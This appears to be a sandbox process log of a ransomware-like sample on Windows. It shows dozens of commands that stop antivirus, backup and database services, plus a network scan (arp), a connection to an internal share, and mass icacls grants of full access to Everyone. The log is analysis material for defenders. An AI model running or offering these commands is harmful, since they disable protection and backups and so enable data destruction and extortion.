- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:6472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:6464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:6448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:6440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:6432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:6424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:6416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:6376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:6368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:6360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:6352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:6344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:6328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:6320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:6312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:6300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:6292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:6276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:6268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:6260
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:6252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:6244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:6236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:6224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:6216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:6208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:6200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:6192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:6168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:6160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:6152
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:4976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:3948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:5324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:5316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:5216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:5184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:5136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:5148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:4180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:4712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:4112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:6136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:6128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:6120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:6112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:6104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:6096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:6088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:6072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:6064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:6056
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:6040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:6032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:6016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:6008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:6000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:5992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:5984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:5976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:5968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:5960
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:5952
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:5936
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:5924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:5916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:5908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:5900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:5892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:5884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:5628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:5368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:5352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:5128
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:7532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.118
  2⤵
  PID:12056
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5944
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp38AB.bat
  2⤵
  PID:14572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat /grant Everyone:F /T /C /Q
  2⤵
  PID:12808
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:15056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  PID:14984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:16492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:7620
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:12344
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:12796
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:4828
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:5108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:5600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:5224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:5968
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:8644
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:13004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:5444
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:12604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:4916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:14420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:14364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:7100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:17808
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:10396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
  2⤵
  PID:13720
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
  2⤵
  PID:11136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141517-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:13684
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141647-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:13676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141926-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:9632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-142146-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:12608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:5032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\ja-JP\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:13068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\fr-FR\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:12732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\de-DE\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:13100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:13076
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:13024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:13336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:9408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:9500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:12624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:8832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7708
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:15140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:5748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6928
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:13360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:17364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:12320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:8912
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8900
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-10142021-141517.log /grant Everyone:F /T /C /Q
  2⤵
  PID:7204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-10142021-141517.log /grant Everyone:F /T /C /Q
  2⤵
  PID:12824
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-10142021-141517-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:13724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:10300
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:9564
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.80 /grant Everyone:F /T /C /Q
  2⤵
  PID:9680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.83 /grant Everyone:F /T /C /Q
  2⤵
  PID:11820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.A0 /grant Everyone:F /T /C /Q
  2⤵
  PID:7832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:13620
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q
  2⤵
  PID:6720
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q
  2⤵
  PID:11008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q
  2⤵
  PID:11052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q
  2⤵
  PID:9480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q
  2⤵
  PID:9784
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q
  2⤵
  PID:11508
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q
  2⤵
  PID:6752
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q
  2⤵
  PID:10476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q
  2⤵
  PID:9524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q
  2⤵
  PID:10484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q
  2⤵
  PID:13568
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q
  2⤵
  PID:9452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q
  2⤵
  PID:6300
